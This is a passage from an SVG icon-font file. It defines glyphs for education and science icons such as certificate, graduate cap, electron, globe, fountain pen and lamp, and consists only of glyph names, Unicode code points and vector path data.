0-2 0-3 0 0 1-1 2-1z m-38 60c-2 0-2-1-2-2 1-3 1-6 1-10 0-2-1-5 0-7 1-2 4-1 7-2 1-1 2-1 2 1 1 3 2 6 3 10 2 9-2 13-11 10z m24-6c-3 1-5 1-8 1-1 0-1 0-2-1 0-4 0-7-1-11-1-2-3-4-2-6 0-2 3-3 5-4l1 0c1-1 1-1 2 0 3 4 5 7 7 11 0 2 1 3 1 5 0 2-1 4-3 5z m-45-127l0 0c1 0 2 1 1 2-1 3-1 7 0 10 0 2 1 5 0 7-2 2-5 2-7 3-2 0-2 0-3-2-1-3-2-6-3-10-2-10 3-12 12-10z m52 67c0 22-19 41-41 41-24 1-42-18-42-41-1-23 18-42 41-42 23 0 42 18 42 42z m-84-53l1 0c0 0 1 0 1 1 2 5 5 10 8 15 1 0 1 1 0 1-2 2-3 4-5 5l-1 1c0 0-1 0-1-1-3-2-5-4-8-7-7-8-4-12 5-15z m90 103c-2 1-4 1-5 2-2 1-3 0-3-1-1-4-3-6-4-9-2-2-4-4-4-6 1-2 3-4 5-6 1-1 1-1 2 0 4 3 7 6 9 9 2 2 3 4 3 6 0 2-1 4-3 5z m5-10c0 0 0 0-1-1-3-5-7-8-11-12-1 0-1-1 0-2 1-2 2-4 3-6 0 0 0-1 1 0 5 2 10 4 14 8 1 1 2 2 2 4 0 0 0 1 0 1 0 3-5 7-8 8z" />
<glyph glyph-name="certificate-alt-2" horiz-adv-x="1000" unicode="&#xead5;" d="M836 391c-53-22-92-58-117-108-24-47-30-95 5-140 31-40 74-56 123-44 54 14 87 51 102 103 9 35-1 67-28 92-19 17-42 22-68 14-28-11-46-36-41-64 5-31 31-30 53-34 5-1 9 0 14 1 16 1 28-3 30-21 1-18-13-23-27-26-53-11-109 18-118 61-12 59 25 118 82 130 46 10 86 0 118-37 37-43 45-93 26-146-46-120-188-164-285-80-82 72-173 134-270 186-42 23-51 60-47 102 5 44 26 79 69 97 13 5 26 2 40-3 109-41 221-71 339-83z m-836 120c1 48 19 85 53 115 34 29 72 33 111 11 60-32 120-64 180-95 14-8 20-12 6-26-38-41-60-90-58-147 0-15-5-19-18-14-77 31-157 52-237 73-39 11-35 53-37 83z m172-218c73 55 142 35 209-20-43-19-86-37-130-56-9-4-17 0-14 11 11 43-18 52-50 58-7 1-14 2-15 7z" />
<glyph glyph-name="certificate" horiz-adv-x="1000" unicode="&#xead6;" d="M773 596v-147c-8 2-17 5-26 7v119c0 17-10 43-22 57-15 17-30 35-45 52-12 14-23 28-36 42-11 13-35 24-53 24h-378c-17 0-32-15-32-32v-736c0-18 15-32 32-32h333v-38h-356c-20 0-36 16-36 36v804c0 20 16 36 36 36h413c19 0 45-13 58-27 13-16 27-31 40-45 16-20 32-39 49-58 13-15 23-43 23-62z m68-341c6 7 6 15 0 22-4 5-9 10-14 15-6 7-9 14-6 23 2 6 4 12 6 19 3 11 1 16-10 21-5 3-11 5-17 7-9 3-15 10-16 19-1 7-2 14-3 20-2 10-7 14-17 14-7 0-14 0-20-1-10-1-17 3-23 11-3 5-6 10-10 15-7 9-13 11-24 5-4-2-8-4-11-7-12-8-23-8-34 1-4 2-9 5-13 7-9 4-16 3-22-5-4-5-7-11-11-17-5-8-12-11-22-10-7 1-14 1-22 1-8 0-13-4-15-12-2-7-3-14-4-21-1-10-6-16-15-20-6-2-12-4-18-7-10-5-13-10-10-21 1-5 3-11 5-16 4-11 2-20-6-27-4-4-7-8-11-12-8-9-8-17 0-26 3-4 7-8 10-11 9-8 11-17 7-28-2-5-4-10-5-16-3-11 0-17 10-21 6-3 12-5 18-7 9-4 14-10 15-20 1-4 1-8 2-12 2-18 8-23 25-21 3 0 5 0 8 1 15 3 24-4 32-16 13-23 18-24 40-10 13 9 24 9 37 1 22-15 27-13 40 8 8 13 17 20 32 16 4-1 8 0 12-1 12 0 17 3 20 15 1 5 2 9 2 13 1 15 7 24 21 28 5 1 10 3 14 5 9 4 12 10 9 20-1 6-3 12-5 17-4 11-2 19 6 27 5 4 9 9 13 14z m-98-174v-168c-20 10-40 18-58 29-17 12-32 12-50 0-17-10-35-18-54-27l-3-2v168c4-4 9-6 11-10l13-18c8-10 17-12 28-6 5 2 10 4 15 8 9 7 18 6 28-1 3-3 8-5 13-7 12-6 22-3 30 8 5 6 8 12 13 18 3 3 8 5 14 8z" />
<glyph glyph-name="education" horiz-adv-x="1000" unicode="&#xead7;" d="M469 388c3 14 3 22-15 25-69 10-139 16-209 13-78-4-155-13-232-23-14-2-14-10-12-22 10-74 20-149 31-224 6-45 12-91 18-136 2-8 2-19 15-19 49-2 96-17 142-31 51-16 101-35 140-74 5-5 7-15 15-13 9 3 7 13 9 20 17 87 34 174 51 260 16 75 31 150 47 224z m456-170c-42 25-83 51-125 76-80 47-166 83-256 108-12 4-20 5-25-12-21-78-42-156-62-235-21-87-44-173-66-259-1-4-2-9 2-12 3-2 7 1 10 2 33 17 70 18 106 22 13 1 27-3 40-4 52-4 104-11 153-28 16-6 24-4 32 11 63 104 129 205 196 306 8 12 7 18-5 25z m63 123c-15 4-28 11-42 16-89 32-182 49-276 57-36 4-73 9-110 1l10-2c61-11 121-25 178-51 59-27 114-59 165-99 10-7 15-8 24 3 17 21 35 40 53 61 6 6 10 10-2 14z m-958 109c3-11 9-12 18-9 32 10 65 14 98 18 62 8 124 11 185-1 25-5 49-8 74-12l1 6c-20 7-41 14-61 22-105 40-215 60-327 67-11 1-14-3-11-13 8-26 16-52 23-78z m951 21c-72 14-145 13-218 10-68-2-137-10-203-32 10 1 20 3 30 3 118 2 236-5 351-39 43-13 42-11 57 32 6 20-1 23-17 26z m-918 121c98-10 191-40 281-79 25-10 50-21 80-33-8 14-17 19-26 25-90 59-186 110-288 146-53 19-60 15-63-41 0-12 3-17 16-18z m375-12c-56 41-113 82-170 123-4-5-7-10-11-15 57-41 114-82 170-123 4 5 7 10 11 15z m180 1c49 51 97 101 146 151-5 5-9 9-14 14-49-51-97-101-146-151 5-5 9-9 14-14z m28-60c69 16 137 32 205 48-2 6-3 12-5 18-68-16-136-32-204-48 1-6 3-12 4-18z m-44 302c-6 2-12 3-18 4-14-69-27-137-41-206 6-1 12-3 18-4 14 69 28 137 41 206z m-114-209c6 2 6 4 4 9-20 50-39 100-59 150l-14 35c-1 3-2 4-5 3-5-2-9-3-14-5 26-66 52-131 77-196 4 2 8 4 11 4z m-85 33l38-49c2-2 5-5 7-8 5 4 10 8 15 12-20 25-39 49-58 74-5-4-8-7-12-10-3-2-2-4-1-6 4-5 7-9 11-13z m101 13c1-13 2-26 4-40 6 1 12 1 18 2-2 31-5 62-8 93-6 0-10-1-15-1-4 0-5-2-4-5 2-17 3-33 5-49z m199-46c-13-8-27-15-41-23-12-7-23-14-35-21 3-5 6-11 9-16 27 15 54 30 81 46-3 4-6 8-7 12-2 4-3 4-7 2z m-112-10c14 27 29 55 43 83-6 3-11 5-17 8-14-28-28-55-43-82 6-3 11-6 17-9z" />
<glyph glyph-name="electron" horiz-adv-x="1000" unicode="&#xead8;" d="M964 600c-28 48-87 74-171 74-24 0-51-3-79-7-43 112-108 183-183 183-22 0-43-7-64-19-12 8-25 12-40 12-42 0-77-34-77-76 0-20 8-37 20-51-8-15-16-31-22-49-28 4-55 7-79 7-84 0-143-26-171-74-38-65-9-157 67-250-23-28-41-56-55-83-4 1-9 2-14 2-42 0-77-34-77-77 0-40 32-73 72-76 2-5 4-11 7-16 28-49 87-74 171-74 24 0 51 2 79 7 43-112 108-183 183-183 75 0 141 71 183 183 28-4 55-7 80-7 5 0 9 0 14 1 14-21 38-35 65-35 42 0 76 34 76 76 0 4 0 7-1 11 6 6 12 13 16 21 38 65 9 157-66 250 75 93 104 185 66 250z m-250-87c-21 14-42 28-65 41-23 13-46 25-69 36 37 14 73 25 108 32 11-33 19-70 26-109z m-39 146c-46-10-95-26-144-47-49 21-97 37-144 47 5 13 10 24 16 35 7-2 15-4 24-4 42 0 76 34 76 77 0 12-3 24-9 35 12 5 25 9 37 9 56 0 108-59 144-152z m-301-37c35-8 71-18 108-32-23-11-46-23-69-36-22-13-44-27-65-41 7 39 16 75 26 109z m-242-42c20 35 69 55 137 55 20 0 43-2 66-6-14-44-24-94-31-148-43-32-81-66-113-100-62 77-87 151-59 199z m167-307c-31 25-58 51-82 77 24 26 51 52 82 77-2-25-3-51-3-77 0-26 1-52 3-77z m-30-208c-68 0-117 20-137 55-1 1-1 3-2 4 25 13 43 38 43 68 0 24-11 44-27 58 11 23 26 46 45 70 32-35 70-69 113-101 7-54 17-104 31-148-23-4-46-6-66-6z m79 122c21-14 43-28 65-41 23-13 46-25 69-36-37-14-73-24-108-32-10 33-19 70-26 109z m183-298c-56 0-107 59-144 152 46 10 95 26 144 47 49-21 98-37 144-47-36-93-88-152-144-152z m157 189c-35 8-71 18-108 32 23 11 46 23 69 36 23 13 44 27 65 41-7-39-15-76-26-109z m33 162c-29-21-59-41-92-60-32-19-65-35-98-50-33 15-65 31-98 50-33 19-63 39-92 60-4 36-6 72-6 110s2 74 6 110c29 21 59 41 92 60 33 19 65 35 98 50 33-15 66-31 98-50 33-19 63-39 92-60 4-36 6-72 6-110 0-38-2-74-6-110z m73 395c67 0 116-19 136-55 28-48 3-122-59-199-32 34-70 68-113 100-6 54-17 104-31 148 23 3 46 6 67 6z m-31-208c31-25 58-51 82-77-24-26-51-52-82-77 2 25 3 51 3 77s-1 52-3 77z m167-307l0-1c-14 16-35 26-57 26-43 0-77-34-77-77 0-1 0-2 0-3l-2 0c-21 0-43 2-66 6 13 44 24 94 30 148 43 32 81 66 113 100 62-77 87-151 59-199z m-399 323c-51 0-93-41-93-93s42-93 93-93c51 0 93 41 93 93 0 51-42 93-93 93z" />
<glyph glyph-name="fountain-pen" horiz-adv-x="1000" unicode="&#xead9;" d="M542 201c-5 4-7 6-10 8-54 54-108 109-162 162-9 9-6 13 2 20 167 143 335 287 502 431 9 7 14 8 23-1 27-28 55-56 84-84 10-9 8-15 0-24-123-143-246-287-369-430-20-23-40-47-60-70-4-4-7-8-10-12z m-25-22c-75-52-149-103-222-154-9-6-14-5-22 2-28 30-57 59-87 87-7 8-6 13-1 20 49 71 97 141 146 212 6 8 10 10 18 2 55-56 111-111 168-169z m-517-329c39 41 55 87 62 137 2 15 8 25 20 34 30 21 58 43 87 65 8 6 14 7 21-1 17-18 34-35 53-52 9-8 10-14 2-25-27-33-53-68-80-102-4-6-8-12-17-11-51 2-96-17-138-42-2-1-4-1-10-3z m143 103c-1 13-8 22-21 23-12 0-21-7-22-20-1-13 5-22 20-23 14-1 20 8 23 20z m773 897c46 1 85-37 84-85-27 28-57 58-84 85z" />
<glyph glyph-name="globe-alt" horiz-adv-x="1000" unicode="&#xeada;" d="M948 437v-49c-2-11-3-23-5-34-36-221-238-367-458-326-152 28-256 119-303 266-47 149-14 285 97 396 203 204 545 126 645-144 13-35 18-72 24-109z m-668 179c20 0 20 0 20-19 1-18-1-37 8-54 9-18 18-37 26-55 5-12 13-19 27-17 12 1 22-4 26-16 18-41 50-68 87-91 14-10 28-18 46-16 13 1 19-5 18-19-1-18 0-37 0-55 0-13 4-19 17-18 12 0 18-4 18-17 1-13-4-20-17-19-14 1-19-6-18-19 0-25 0-50 0-75 0-54-7-47 48-47 8 0 17-2 19 8 1 12-9 10-16 11-4 0-8-1-9 4-1 4 3 6 5 8 9 9 18 17 27 25 44 38 85 78 104 136 8 25 6 35-17 48-6 2-12 5-17 8-48 31-98 46-156 41-35-2-58 26-75 51-20 29 0 55 35 52 10-1 14-5 14-15l0-31c0-9 4-15 14-15 8 0 11 6 11 14 0 14 2 28 0 42-3 25 7 42 28 54 10 6 19 10 31 10 14 0 28 0 43 0 6 0 15-1 15 7 0 10-9 9-16 10-2 0-4 0-6 0-12-1-17 5-17 16 0 6 0 12 0 18 0 24 0 24-24 28-9 1-11 4-5 11 7 7 13 13 20 20 5 6 12 13 9 21-3 10-13 6-21 7-37 3-57 24-57 62 0 4 0 8 0 12 2 10-3 12-13 11-31-5-61-12-90-25-57-25-104-61-142-112z m338 102c0-7 0-15 0-22-1-10 4-15 14-16 24-4 24-4 24-29 0-6 0-11 0-16 0-10 7-14 16-14 8 1 15 3 21 8 20 16 39 32 59 47 10 8 7 12-1 18-32 21-65 37-101 48-32 9-32 9-32-24z m-566-274c7 46 13 92 28 137 38 108 104 194 197 259 22 15 43 13 55-4 13-18 7-38-15-53-110-77-175-183-192-316-27-219 117-428 331-482 119-30 231-13 336 48 5 3 10 7 15 9 17 7 37 0 45-16 8-17 3-36-15-47-35-23-74-40-114-53-5-2-12-1-16-8 33-17 69-30 85-68h-493c10 30 36 44 61 57 14 7 28 12 43 18-4 7-10 7-15 9-142 55-242 154-300 295-21 51-30 105-36 159 0 19 0 37 0 56z" />
<glyph glyph-name="graduate-alt" horiz-adv-x="1000" unicode="&#xeadb;" d="M234 651c0-10 0-20 0-29 0-5-1-8-5-12-14-11-16-30-4-41 7-6 7-12 5-19 0-3-1-7-1-11-4-25-7-50-11-75-1-5 1-7 6-7 16 1 32 1 48 0 5 0 6 1 5 6-5 30-9 60-13 90-1 6-1 10 4 14 12 10 13 29 2 39-9 8-9 15-9 25 0 3 0 7 0 11 0 5 1 5 6 4 17-8 34-15 51-21 5-2 6-5 6-9 0-20 0-39 0-59 0-5 1-7 6-5 12 5 24 8 36 10 35 5 70 3 102-16 12-7 22-17 32-28 1 1 2 2 3 3 20 24 45 37 75 41 32 5 62 0 91-10 5-2 7-1 7 5l0 59c-1 5 1 7 6 9 34 13 68 26 103 39 9 4 19 8 29 12-4 2-7 4-10 6-98 55-197 110-296 166-6 3-10 3-16 0-82-47-165-93-247-139l-60-33c15-6 29-11 42-16 5-1 7-4 7-9z m107 19c53 14 105 25 152 24 66 0 122-11 177-28 4-1 5-3 5-7 0-4 0-9 0-13 1-5-1-6-6-4-26 8-53 14-80 20-59 11-118 11-178 0-27-5-54-12-80-20-5-2-6-1-6 5 0 18-1 18 16 23z m332-166c-1 23-2 23-24 29-2 0-3 1-4 1-6 2-6 0-5-5 1-11 3-22 2-33 0-11-1-23-3-34-6-41-23-77-53-106-48-46-116-48-166-6-36 32-55 73-61 121-2 20-2 39 1 59 1 4 1 6-4 4-8-2-16-4-24-7-2-1-3-3-4-6-5-60 8-116 45-165 28-36 64-60 110-65 47-6 88 10 122 42 49 46 69 105 68 171z m-70-6c-1 15-12 26-28 26-15 0-26-12-26-27 0-15 12-27 27-26 15 0 27 11 27 27z m-152-1c0 15-11 27-26 27-16 0-27-11-27-26 0-16 11-27 26-27 15 0 27 11 27 26z m10-103c-4 0-6-1-3-5 9-17 23-26 42-26 19 0 33 10 42 26 3 4 1 5-3 5-13 0-26 0-39 0-13 0-26 0-39 0z m374-427c-5 40-8 80-16 119-6 27-13 54-22 80-11 29-29 51-59 65-44 19-92 30-132 60-1-4-2-6-2-7 4-28 7-55 11-82 2-11 5-23 1-33-14-37-29-74-44-112-10-25-21-51-30-77-11-31-24-62-41-93-14 39-29 78-43 117-15 39-31 78-46 118-9 26-20 52-17 81 3 24 1 49 1 73 0 5 2 11-3 15-37-26-78-42-121-56-21-6-41-18-53-37-19-33-31-70-38-108-3-16-4-33-8-48-7-29-6-59-8-89-1-14-1-32 14-39 27-13 56-23 86-31 26-6 52-10 78-15 52-11 105-18 157-18 66 0 130 12 194 25 42 8 82 20 121 36 7 3 14 8 16 15 3 14 6 27 4 41z m-325 199c-4 2-7 4-12 1-8-6-16-11-24-16-7-5-10-11-7-19 1-5 3-9 4-14 5-51 17-100 24-151 1-13 4-27 9-41 3 10 7 19 8 29 4 38 13 74 18 111 2 15 2 31 7 45 9 31 8 34-19 50-3 1-5 4-8 5z m37 75c-4 4-10 2-15 0-17-7-35-5-53-2-6 1-12 5-21 1 14-20 28-39 40-59 6-12 9-6 13-1 11 16 20 33 31 49 3 4 8 8 5 12z" />
<glyph glyph-name="graduate" horiz-adv-x="1000" unicode="&#xeadc;" d="M938 609v53h-875v-53h193l-40-175 287-42 287 43-40 174h130v-188h-15v-196l58 25v171h-14v188h29z m-435-260l-290 42c-3-17-5-35-5-53 0-166 132-300 293-300 162 0 294 134 294 300 0 18-2 36-5 53l-287-42z" />
<glyph glyph-name="group-students" horiz-adv-x="1000" unicode="&#xeadd;" d="M998-47c0 2 0 4 0 6-2 57-6 114-12 171-5 44-11 87-19 130-5 28-20 46-45 56-15 6-31 12-46 18-9 3-13 1-16-7-13-28-30-52-54-72-20-16-42-31-64-44-12-6-16-14-16-27 1-76 1-152 1-228 0-1 0-1 0-2h-27c0 1 0 1 0 2 0 78 0 156 0 234 0 8-2 13-9 17-14 8-28 17-41 26-21 14-41 30-57 50-12 15-20 31-29 47-2 4-4 8-10 6-23-9-47-16-68-30-12-7-20-17-23-30-16-66-23-132-29-199-3-41-6-82-6-123h0c-1-5-1-10-1-16-1-17 7-25 24-25l262 0 263 0c17 0 25 8 24 25 0 5-1 10-2 15z m-423 545c9-6 13-13 17-22 13-33 28-65 54-90 38-37 88-38 127-3 30 28 49 63 65 100 2 6 5 11 11 15 23 15 27 38 10 60-3 4 0 6 1 9 4 14 8 28 8 42 1 38-15 69-39 96-7 7-7 12-4 19 5 9 10 17 15 26-15-1-26-6-37-12-7-4-9-2-12 4-7 14-9 29-13 45-8-7-12-15-15-23-4-9-7-8-13-3-8 7-15 16-26 22 0-3-1-4-1-5-3-7 6-17-2-21-6-4-15-2-22-2l-1-1c-62-7-106-40-133-94-14-29-11-59-3-90 2-4 5-8 1-13-18-23-7-48 12-59z m31 65c31-2 62 1 92 8 32 8 60 23 85 47 8-27 21-48 41-65 3-3 4-6 3-10-14-48-32-95-67-132-10-10-21-19-35-23-27-7-47 6-64 24-24 27-37 60-48 94-5 16-9 32-14 48-2 8 0 9 7 9z m190-209c-3 0-6 1-8-3-13-34-43-51-70-70-3-2-5-4-9-1-27 19-57 36-71 69-1 3-2 7-6 5-14-3-27-5-40-8-6-1-5-4-3-7 11-17 20-34 34-49 24-27 56-44 86-64 4-3 7-1 10 1 16 11 32 22 49 33 30 19 51 48 68 79 3 4 3 7-4 8-12 2-24 4-36 7z m-402-416c0 5 0 11 0 16h1c0 41 3 82 6 123 1 11 2 22 3 33-22-6-44-11-67-15-25-5-51-11-77-10-25 2-50 7-75 12-46 10-92 22-138 36-7 2-9 0-10-7-7-58-14-116-16-175 0-6 0-10-1-13h0c0-2 0-4 0-7-1-12 6-18 21-18l227 1h147c-15 0-22 8-21 24z m-328 435c7 1 9 2 9 9-2 33 0 65 7 96 5 18 11 34 27 48 4-26 15-48 34-65 5-4 8-10 12-16 14-25 31-48 54-66 34-27 75-28 110-2 25 18 42 43 57 69 3 4 5 8 8 11 17 17 27 37 33 59 1 3 0 8 3 9 5 1 7-4 10-7 13-18 19-38 22-60 4-25 5-50 4-75 0-5-1-9 6-10 40-4 70 23 69 62-1 54-46 109-99 120-8 2-10 6-9 13 1 20 0 41-7 60-22 63-67 100-133 108-67 7-120-21-156-79-16-27-22-56-20-87 1-9-1-13-11-15-30-7-53-25-71-50-15-20-24-43-25-68-1-39 21-66 66-64z m91 163c17 5 25 20 33 34 3 6 6 13 10 22 5-16 4-30 1-44-2-7 0-9 6-10 9 0 16 2 23 8 13 15 20 33 26 51 1 3 1 6 4 9 5-17 3-35 2-52 0-6 2-8 7-9 33-4 65-6 98 1 13 3 13 3 11-9-8-46-27-87-58-122-34-39-77-38-111 1-2 2-3 4-5 6-25 31-41 66-50 105 0 4-3 8 3 9z m8-266c2 22 5 44 7 67-26-8-50-18-73-31-17-10-28-25-33-44-8-27-14-55-20-83-2-9 1-11 9-13 57-18 114-32 173-42 16-3 33-8 50-5 44 7 87 16 130 27 5 43 11 87 22 129 2 10 7 18 14 24-3 2-5 4-8 6-21 13-43 22-66 30-9 3-9-2-8-8 5-23 7-46 8-69 2-19 1-38 1-58-32 19-64 38-96 58-5 3-9 4-15 0-31-19-61-37-91-56-6-3-8-2-7 4 1 22 1 43 3 64z" />
<glyph glyph-name="hat-alt" horiz-adv-x="1000" unicode="&#xeade;" d="M861 30c-10 0-20-1-30 0-13 1-19 10-15 23 7 19 13 39 21 59 2 5 1 8-4 11-32 24-30 69 3 90 5 3 6 6 6 11 0 79 0 158 0 237 0 9-2 10-10 8-103-27-207-53-310-79-16-4-31-4-46-1-154 40-308 80-460 127-9 3-16 7-16 18 0 10 8 13 16 16 96 29 192 51 289 76 51 14 103 26 155 39 29 8 59 7 88-1 145-37 290-75 432-122 2 0 3-1 5-1 9-3 16-8 15-18 0-10-7-13-16-15-34-9-68-18-102-26-6-2-8-4-8-10 0-82 0-165 0-247 0-5 2-7 6-9 39-18 43-67 9-93-5-3-5-6-3-12 7-19 13-37 20-56 5-16-1-25-18-25-9 0-18 0-27 0z m-683 350c0 16 1 33 0 50 0 8 2 9 10 7 63-18 127-36 192-51 35-9 71-17 106-26 20-4 38 1 56 6 89 24 178 45 266 68 14 3 14 3 14-11 0-29 0-58 0-87 0-20-7-36-21-49-21-21-47-33-74-42-53-18-109-27-165-30-61-5-122-3-183 6-46 6-92 16-135 36-18 8-35 18-48 32-12 13-18 28-18 46 0 15 0 30 0 45h0z" />
<glyph glyph-name="hat" horiz-adv-x="1000" unicode="&#xeadf;" d="M978 537c-145 45-290 91-434 136-8 3-16 5-24 8h-4c-4-2-8-3-11-4-76-23-151-45-226-68-74-23-148-46-222-70-6-1-11-4-16-7-12-7-13-19-2-28 6-5 14-10 23-12 45-15 90-28 136-42 3-1 8 1 12 3 10 8 19 17 29 24 62 46 132 72 208 78 30 3 61 1 91 1 16-1 26-12 25-28 0-14-12-24-27-24-6 1-12 1-17 1-71 4-138-7-201-40-19-9-36-21-55-33 3-2 4-3 5-3 73-23 147-46 221-68 21-6 42-7 63 0 142 45 284 90 426 136 8 3 15 10 22 16v9c-7 5-14 12-22 15z m-531-25c29 3 59 1 88 1 10 0 18 6 19 15 1 9-5 16-15 18-2 1-5 1-7 1-39 2-77 2-116-5-100-17-182-65-245-144-5-7-10-11-19-12-16-4-27-14-31-31s-1-30 12-41c6-6 7-13 7-21-3-33-15-63-35-89-27-36-56-71-84-106-2-3-5-5-7-8 44 30 76 70 100 116 9-1 9-6 6-11-13-19-24-40-38-59-23-32-50-60-82-82v-2c11-7 23-13 34-20 2 2 3 3 4 3 28 34 55 69 74 109 2 5 5 9 11 3-13-45-32-88-65-125 9-1 17-2 24-2 27-1 50 7 63 33 3 8 8 15 11 23 30 73 44 147 34 226-1 4 1 9 3 12 14 16 17 36 5 54-3 5-3 8 1 12 65 79 148 122 248 133z m-185-211c24-12 49-25 74-34 87-31 177-36 267-19 59 11 115 31 167 61 5 3 8 6 5 13-3 11-6 23-9 35-3 14-7 28-11 42-2-1-2-1-3-1-66-17-131-35-197-52-15-5-31-8-48-4-31 7-62 13-93 21-45 11-90 24-135 36-1-1-2-2-2-3-7-29-14-57-20-85-1-3 2-9 5-10z m-7-17c-6-19-6-19 9-32 28-25 60-45 94-62 62-28 126-41 193-32 85 11 158 49 221 106 12 11 13 14 5 29-172-93-346-101-522-9z" />
<glyph glyph-name="instrument" horiz-adv-x="1000" unicode="&#xeae0;" d="M759-150c-3 8-10 12-15 17-81 81-162 163-244 244-83 83-166 166-249 249-82 83-165 165-248 248-4 4-4 6 0 11 76 76 153 152 229 228 4 4 6 4 10 0 77-77 154-155 231-232 7-6 15-13 21-20 5-5 7-5 12 0 29 29 59 59 88 89 5 5 10 7 17 5 30-8 60-15 89-23 5-1 8-3 11-6 31-31 62-63 93-94 4-3 6-7 7-11 8-30 15-60 23-90 1-6 0-10-4-14-30-29-60-59-90-89-5-5-6-8 0-13 84-84 167-167 251-251 3-3 5-7 9-7v-2c-2-1-4-3-5-4-77-77-153-153-230-230-1-1-2-3-4-5h-2z m-515 737c-2-2-4-4-6-6-20-21-41-42-62-62-4-4-5-7 0-11 9-9 18-18 27-27 4-5 6-4 10 0 7 7 13 13 20 20 12 12 12 12 24-1 5-5 4-7 0-11-9-9-17-18-26-26-4-3-5-6 0-10 9-9 19-19 28-28 3-4 5-4 9 0 6 7 13 14 20 20 12 12 12 12 24 1 4-5 5-8 0-12-9-9-17-18-26-26-4-4-4-6 0-10 9-8 17-17 26-26 5-6 8-5 14 0 19 20 40 40 60 61 5 5 9 5 13-1 1-1 2-2 3-3 7-5 7-9 1-15-21-20-41-40-61-60-2-3-7-6-2-10 10-10 20-20 30-30 3-3 5-3 8 0 7 7 14 14 21 21 12 12 12 12 24 0 4-4 5-7 0-12-9-8-18-17-27-26-4-4-4-6 0-10 10-9 20-18 29-28 3-4 5-3 8 0 7 7 14 14 21 21 12 11 12 11 24 0 5-5 4-8-1-13-8-8-16-16-25-25-4-3-5-6 0-10 9-9 18-17 26-27 5-4 8-5 12 1 19 19 38 37 56 56 12 11 12 11 24 0 5-5 5-8 0-13-21-20-41-41-62-62-5-4-5-7 0-11 9-9 18-18 27-27 3-4 6-4 9 0 7 7 14 13 20 20 13 12 12 12 25 0 5-5 4-8-1-12-9-8-17-17-26-25-3-3-4-6 0-10 10-9 19-19 29-29 3-4 6-3 9 1 6 6 12 12 19 19 13 13 13 13 26 0 4-4 3-6 0-10-9-9-18-18-27-27-4-3-5-6-1-10 10-8 19-17 27-27 5-4 7-5 12 0 19 20 39 39 59 59 9 10 9 10 19 0 0-1 1-1 1-2 7-4 5-8 0-13-21-21-41-41-62-62-4-4-4-6 0-11 10-8 19-18 28-27 3-4 6-4 9 0 7 7 13 13 20 20 13 13 13 13 25-1 4-4 4-6 0-9-9-9-17-18-26-27-5-4-6-6-1-11 9-8 18-17 26-26 6-6 9-4 14 1 50 51 101 102 152 152 6 6 6 9 0 15-39 39-78 78-117 117-64 63-127 127-191 191-60 60-121 121-181 181-63 63-125 125-188 188-5 4-7 5-12 0-16-17-33-33-49-50-35-34-69-69-104-103-7-7-6-10 0-16 5-4 10-8 14-13 4-5 7-5 11-1 6 7 13 13 19 20 13 13 13 13 26-1 3-4 3-6-1-9-9-9-17-18-27-27-3-4-4-6 0-10 10-9 19-18 28-28 4-5 7-4 10 0 21 21 41 41 61 61 3 3 5 8 9 6 5-5 10-11 16-16z m372 23c-1 1-3-2-5-4-20-20-39-39-59-59-4-4-4-6 0-10 9-9 18-18 27-28 4-4 7-3 10 1 8 8 16 16 24 23 17 18 35 35 52 53 2 2 7 5 1 7-16 6-32 11-50 17z m146-145c0 1-1 2-1 4-5 14-10 27-14 41-2 7-4 8-9 3-25-26-51-51-76-76-3-4-4-6 0-10 9-9 19-18 28-28 3-4 6-4 9 0 20 20 39 39 59 59 2 1 4 3 4 7z m-599-300c18-6 35-11 51-17 5-2 8 1 10 4 20 20 39 39 58 58 5 5 8 6 13 1 21-22 43-43 65-65 4-4 5-7 0-12-20-19-39-39-59-58-4-4-5-8-3-14 5-13 9-26 13-38 3-10 3-10 10-3 25 25 50 50 75 75 6 6 9 6 14 0 9-10 18-19 27-27 4-4 4-7 0-10-48-48-96-96-143-144-3-3-7-5-11-5-73-17-146-33-220-49-5-2-9 0-14 3-17 13-20 29-17 50 7 54 11 110 17 165 2 20 4 40 6 59 0 5 3 9 6 12 47 47 94 94 141 141 5 5 8 6 12 1 11-11 21-22 32-32 5-4 4-7 0-11-26-26-52-51-78-77-1-2-3-4-5-7z m-84-175c-1-3 3-5 5-8 18-18 37-37 55-56 3-3 6-4 10-3 31 7 62 14 93 20 6 1 7 5 8 9 4 18 8 36 12 54 1 6 0 10-5 14-29 29-58 58-87 88-3 3-6 4-11 3-19-4-38-7-58-10-5-1-7-4-8-9-1-13-3-25-5-38-3-21-6-42-9-64z m574 755c12 10 22 19 31 28 14 14 28 28 42 43 4 3 7 5 13 4 30-9 61-16 92-24 4-1 7-3 10-5 31-32 62-63 94-95 3-3 5-6 6-10 7-30 15-60 23-90 1-5 1-9-3-14-23-22-46-45-69-68-1-1-2-1-4-3-5 23-11 45-17 67 0 1 0 2 0 4-3 23-15 40-33 56-25 24-49 49-74 74-4 4-9 7-15 8-27 7-54 13-81 20-4 1-7 3-15 5z" />
<glyph glyph-name="lamp-light" horiz-adv-x="1000" unicode="&#xeae1;" d="M983 290c22 22 23 42 1 64-85 86-171 173-257 259-18 18-18 17 0 36l2 1c24 25 25 54 1 79-22 23-44 44-66 66-28 29-56 29-84 1-43-42-85-84-127-127-6-6-10-7-17 0-21 22-42 44-64 65-18 19-41 19-60 1-19-19-39-39-58-58-18-19-18-41 1-60 23-23 46-47 69-70 6-5 6-8 1-15-27-41-22-94 14-130 33-34 88-39 129-12 6 4 9 3 14-2 21-22 43-44 65-65 18-18 40-18 58 0 20 20 40 39 59 59 18 18 18 40 1 58-19 19-38 38-57 57-17 17-17 17 0 33 1 2 3 3 4 4 6 10 11 7 17 0 68-68 136-137 204-205 6-6 4-9-1-14-103-102-206-204-309-307-4-4-9-6-16-6-23 0-46 1-68 0-24 0-39-15-41-38-1-11 0-23 0-34 0-31 15-46 45-46 36 0 72 0 108 0 62-1 124-1 186-1 26 0 42 17 42 43 0 10-1 21 0 31 3 23-15 46-43 45-13-1-27 0-42 0 4 4 7 7 10 10 93 93 186 186 279 278z m-712-2c-20 14-37 32-51 51-4 6-6 6-11 1-32-32-64-64-97-97-8-8-13-18-13-28 0-19 11-37 28-44 17-7 33-4 47 9 33 32 65 65 98 97 5 5 4 7-1 11z m-81 109c-6 18-11 38-12 57-2 22-2 22-23 17-41-11-83-22-125-34-21-6-33-26-29-46 3-24 20-40 43-40 3 0 7 0 10 1 44 12 88 23 132 35 6 1 6 4 4 10z m138-141c-6 3-7-1-9-6-11-43-23-86-35-129-6-23 6-46 29-53 26-8 49 4 56 29 3 10 6 21 9 32 10 37 20 74 30 112-28 1-54 5-80 15z" />
